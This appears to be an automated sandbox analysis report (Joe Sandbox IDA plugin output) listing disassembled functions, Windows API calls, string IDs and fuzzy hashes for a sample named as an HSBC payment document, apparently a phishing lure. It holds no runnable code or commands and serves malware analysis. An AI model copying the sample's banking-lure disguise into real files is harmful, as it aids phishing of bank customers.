                                                                                                                                • Opcode Fuzzy Hash: 2100af5003261345a812e330f66480f453a04838f925e08a55dd0677ccfbad6b
                                                                                                                                • Instruction Fuzzy Hash: 13514572408754DBD320EF10E88ABAFBBE8FB85354F46885DF2D8410A1DB359529CB66
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724F0B: __fread_nolock.LIBCMT ref: 00724F29
                                                                                                                                • _wcscmp.LIBCMT ref: 00789824
                                                                                                                                • _wcscmp.LIBCMT ref: 00789837
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                                                • String ID: FILE
                                                                                                                                • API String ID: 4029003684-3121273764
                                                                                                                                • Opcode ID: b9bf06f25b960786377b0dfa60e5e08de4701f99514a01f49674b87d5683b70d
                                                                                                                                • Instruction ID: 19825d7d347a234a63139a99a0709edd67175a8f549feaba83bb8669bf6dfbd1
                                                                                                                                • Opcode Fuzzy Hash: b9bf06f25b960786377b0dfa60e5e08de4701f99514a01f49674b87d5683b70d
                                                                                                                                • Instruction Fuzzy Hash: EE41C871A4021ABADF20AEA0DC49FEFB7BDDF85710F040469FA04B7181DB79A9048B61
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant
                                                                                                                                • String ID: Dd~$Dd~
                                                                                                                                • API String ID: 1473721057-373322267
                                                                                                                                • Opcode ID: 61caa01a63a9af09e8da0a815bbd66d0e19d087865a92127a7f0c8b20c9aa51b
                                                                                                                                • Instruction ID: 8618f75da192704c8699a40f713c88b501ef5226960706b37bf30d332a71d6be
                                                                                                                                • Opcode Fuzzy Hash: 61caa01a63a9af09e8da0a815bbd66d0e19d087865a92127a7f0c8b20c9aa51b
                                                                                                                                • Instruction Fuzzy Hash: E9510478605391EFDB54CF19D580A1ABBF1BB99750F54881CE9858B361E339EC81CF82
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 0079259E
                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007925D4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CrackInternet_memset
                                                                                                                                • String ID: |
                                                                                                                                • API String ID: 1413715105-2343686810
                                                                                                                                • Opcode ID: 707bcba7ae19f64351ff59a64b17864454f03aa7b9e10312a7d00f229d8022fb
                                                                                                                                • Instruction ID: d61073124fc61d6372ce1eda54915527c53e009e730a6cf289ff01617393da15
                                                                                                                                • Opcode Fuzzy Hash: 707bcba7ae19f64351ff59a64b17864454f03aa7b9e10312a7d00f229d8022fb
                                                                                                                                • Instruction Fuzzy Hash: 24311A71800119EBCF15EFA1DC89EEEBFB8FF08350F104059F915A6262EB395956DB60
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 007A7B61
                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A7B76
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID: '
                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                • Opcode ID: 0713b40d6d4440baa9cf13e4a6941a3ecf7fe21540de260be5b18b22555e8e8b
                                                                                                                                • Instruction ID: d25c6275944368457e24487e2adeb6bcdade0edae54b92ed37f48e78fc4e7c11
                                                                                                                                • Opcode Fuzzy Hash: 0713b40d6d4440baa9cf13e4a6941a3ecf7fe21540de260be5b18b22555e8e8b
                                                                                                                                • Instruction Fuzzy Hash: 15411BB4A05209EFDB18CF68C981BDABBB5FF49300F10416AE904EB351D774A951CFA0
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 007A6B17
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007A6B53
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$DestroyMove
                                                                                                                                • String ID: static
                                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                                • Opcode ID: aae456290eb135274503474a8f3313fef4fcc75277e52540f1c7c57443f88c1c
                                                                                                                                • Instruction ID: 19aa2b7b48c354df9dc03a88025d6096e2f614482b9bda1c3ba51fd3b4cf8176
                                                                                                                                • Opcode Fuzzy Hash: aae456290eb135274503474a8f3313fef4fcc75277e52540f1c7c57443f88c1c
                                                                                                                                • Instruction Fuzzy Hash: 0931A1B1200604AEDB109F74CC80BFB73A9FF89760F148619F9A5D7190DA38AC91CB60
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00782911
                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0078294C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                                • Opcode ID: d1e88b4ea694fdb153e9335b3783c87b1d121d5ae8d6175a7e78442447bd8c99
                                                                                                                                • Instruction ID: 1289deaa55fd48f9c25e4211e06dd76aff60528ffe62270e8646a7f96d3051d8
                                                                                                                                • Opcode Fuzzy Hash: d1e88b4ea694fdb153e9335b3783c87b1d121d5ae8d6175a7e78442447bd8c99
                                                                                                                                • Instruction Fuzzy Hash: 66312531A40305EFEF24EF59C885BAEBBB8EF05351F140029ED81B61A2D778A942CB51
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007A6761
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A676C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID: Combobox
                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                • Opcode ID: d5e766b9b305d143223cdc9d2fa2043d10d53325206cb09057023462734722ed
                                                                                                                                • Instruction ID: 49630193d619d362783adebd0a123c724848b9fe4e2737d21115a44676d50dc2
                                                                                                                                • Opcode Fuzzy Hash: d5e766b9b305d143223cdc9d2fa2043d10d53325206cb09057023462734722ed
                                                                                                                                • Instruction Fuzzy Hash: 7E11C4B5310208AFEF11DF64CC84EBB376AEBDA368F154229F91497290D639DC9187A0
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00721D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00721D73
                                                                                                                                  • Part of subcall function 00721D35: GetStockObject.GDI32(00000011), ref: 00721D87
                                                                                                                                  • Part of subcall function 00721D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00721D91
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 007A6C71
                                                                                                                                • GetSysColor.USER32(00000012), ref: 007A6C8B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                • String ID: static
                                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                                • Opcode ID: 7e9c026e53ac076c8315b1cc4db386f5780471d255f9f49ba7bceb9399fae7c1
                                                                                                                                • Instruction ID: 7d6c58eb5ed8f3862b494d75e15f8433e90fe684431eea53e3fa269f1c962f76
                                                                                                                                • Opcode Fuzzy Hash: 7e9c026e53ac076c8315b1cc4db386f5780471d255f9f49ba7bceb9399fae7c1
                                                                                                                                • Instruction Fuzzy Hash: 65215672A10219AFDF04DFB8CC45AEA7BA9FB49314F044A28F995D2250D639E860DB60
                                                                                                                                APIs
                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 007A69A2
                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007A69B1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                • String ID: edit
                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                • Opcode ID: 5496b47fa8df8033287cfb9f5497658f5bfa187c2612a7a9c4c0c3ba6eda1f82
                                                                                                                                • Instruction ID: e4fa693dff9780c740333877d4e3ed9b625d399380c2e5b87fbbae475b47248b
                                                                                                                                • Opcode Fuzzy Hash: 5496b47fa8df8033287cfb9f5497658f5bfa187c2612a7a9c4c0c3ba6eda1f82
                                                                                                                                • Instruction Fuzzy Hash: BA118C71500208AFEB108E74DC44AEB37A9EB96378F544728F9A5971E0C739EC519B60
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00782A22
                                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00782A41
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                                • Opcode ID: 4d1a3acb7280bcccf51c7597e5afc4b5d64bff13f5920c199692b182fa3ed710
                                                                                                                                • Instruction ID: 44b414358cf5865259c5bdb2c957fdde11b96e85806164e7eef4a68ee01e376d
                                                                                                                                • Opcode Fuzzy Hash: 4d1a3acb7280bcccf51c7597e5afc4b5d64bff13f5920c199692b182fa3ed710
                                                                                                                                • Instruction Fuzzy Hash: 7811D336941118EBCB38EA98D944B9A77A8AF45315F04C021EC55E7292D738AD07C792
                                                                                                                                APIs
                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0079222C
                                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00792255
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$OpenOption
                                                                                                                                • String ID: <local>
                                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                                • Opcode ID: 281943512b1b8c13a63382e6ac95fe840c6a97ac7c46114ec9d48b819c37723a
                                                                                                                                • Instruction ID: 6ffacab100a9b66250f446069726553364808c757f1504124de5dacda544ff72
                                                                                                                                • Opcode Fuzzy Hash: 281943512b1b8c13a63382e6ac95fe840c6a97ac7c46114ec9d48b819c37723a
                                                                                                                                • Instruction Fuzzy Hash: 59112570541225FADF28AF51AC85EFBFBACFF06751F10822AFA0446001D3785892D6F0
                                                                                                                                APIs
                                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00723C14,007E52F8,?,?,?), ref: 0073096E
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                • _wcscat.LIBCMT ref: 00764CB7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FullNamePath_memmove_wcscat
                                                                                                                                • String ID: S~
                                                                                                                                • API String ID: 257928180-3256534576
                                                                                                                                • Opcode ID: edd16496d48d66f23ecb0ebaff2b8be9d3b30bcb69b370733315cd8773a0a342
                                                                                                                                • Instruction ID: 14bf19affe80a8a59cc5d59b00a84fdaa99791a142808c9b6cc70fdca9051a92
                                                                                                                                • Opcode Fuzzy Hash: edd16496d48d66f23ecb0ebaff2b8be9d3b30bcb69b370733315cd8773a0a342
                                                                                                                                • Instruction Fuzzy Hash: A211E530A0220CDB9B00EBA0D809FCD73A8AF08355F0044A5B984D3282EAB8A6848B50
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC
                                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00778E73
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                                • Opcode ID: 0ce1c94066dd38c852e0f2495928a1cf7c8bd6b17bc60921365cc55cec847e8c
                                                                                                                                • Instruction ID: b5e45379bf4f6d476c88296e6a78184e96dc177686c8620fbb5add908ed47e21
                                                                                                                                • Opcode Fuzzy Hash: 0ce1c94066dd38c852e0f2495928a1cf7c8bd6b17bc60921365cc55cec847e8c
                                                                                                                                • Instruction Fuzzy Hash: D201F1B1741228EB9F18EBA0CC49CFE7368EF42360B048A19F869572E1EF395808D751
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                                • String ID: EA06
                                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                                • Opcode ID: ce34bc6a125297b40b281fe26dca971c7a111923d1ade9ff3c5e03c2c0c88227
                                                                                                                                • Instruction ID: 2ff66f228347177da54ea76bf76dbd3f6f669195aacfa91f51a7f550c5b428e1
                                                                                                                                • Opcode Fuzzy Hash: ce34bc6a125297b40b281fe26dca971c7a111923d1ade9ff3c5e03c2c0c88227
                                                                                                                                • Instruction Fuzzy Hash: EC01F971944218BFDB58DBA8C81AEFEBBF8DB15311F00419BF552D2281E978A61487A0
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC
                                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00778D6B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                                • Opcode ID: 01321a0cbf2e9d579ca2368bfe44dc520c5a154e20d3b33d9a329a9f3a6214ec
                                                                                                                                • Instruction ID: 3f081405470ea3af6f17e08e34f04e1e49ee279373764370a55c4ed54a217269
                                                                                                                                • Opcode Fuzzy Hash: 01321a0cbf2e9d579ca2368bfe44dc520c5a154e20d3b33d9a329a9f3a6214ec
                                                                                                                                • Instruction Fuzzy Hash: E501B1B1B81118EBDF28EBA0C95AEFE77A8DF15380F104019B80963291DE295A08D262
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC
                                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00778DEE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                                • Opcode ID: 740eb41d92d7df1300d1fe3fcb32916cf8252f5e1a1c0b27cc6b2e528899e505
                                                                                                                                • Instruction ID: f2841016607a9c662c0513e6cb1ea79913cf39c9280fbce7a066d6bc2b108f10
                                                                                                                                • Opcode Fuzzy Hash: 740eb41d92d7df1300d1fe3fcb32916cf8252f5e1a1c0b27cc6b2e528899e505
                                                                                                                                • Instruction Fuzzy Hash: 2B01F7B1B81118F7DF29E6A4C94AEFE77ACCF16340F108016B80963291DE2D5E08D272
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0077C534
                                                                                                                                  • Part of subcall function 0077C816: _memmove.LIBCMT ref: 0077C860
